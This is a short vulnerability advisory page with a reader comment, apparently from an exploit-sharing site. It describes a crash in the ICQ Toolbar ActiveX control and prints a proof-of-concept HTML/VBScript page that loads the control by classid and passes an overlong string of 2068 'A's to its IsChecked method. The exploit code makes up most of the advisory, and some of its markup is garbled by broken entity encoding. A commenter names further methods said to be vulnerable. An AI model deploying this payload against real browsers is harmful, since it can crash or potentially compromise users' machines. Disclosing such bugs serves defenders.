|
|
| |
| A vulnerability in ICQ Toolbar allows remote attackers to cause the control to crash by providing it with an arbitrarily long IsChecked value. |
| |
Credit:
The information has been provided by Nir Goldshlager.
The original article can be found at: goldshlager19 at gmail.com
|
| |
Exploit:
<html>
Test Exploit page
<object classid=&apsclsid:855F3B16-6D32-4FE6-8A56-BBB695989046&aps id=&apstarget&aps ></object>
<script language=&apsvbscript&aps>
&apsWscript.echo typename(target)
&apsfor debugging/custom prolog
targetFile = "D:\Program Files\ICQToolbar\toolbaru.dll"
prototype = "Function IsChecked ( ByVal url As String ) As Long"
memberName = "IsChecked"
progid = "SoftomateLib.SoftomateObj"
argCount = 1
arg1=String(2068, "A")
target.IsChecked arg1
</script>
|
| Subject:
|
HAHA |
Date: |
4 Mar. 2008 |
| From: |
Trancer |
Why not copy-paste the entire COMRaider output?
hehe.. it's lame. at least give credit to the fuzzing tool...
You "e;forgot"e; to mention the following methods that is also vulnerable to similar bugs:
- RequestURL
- GetPropertyById
- SetPropertyById
Great "e;pen-test"e;, LOL |
|
|
|
|
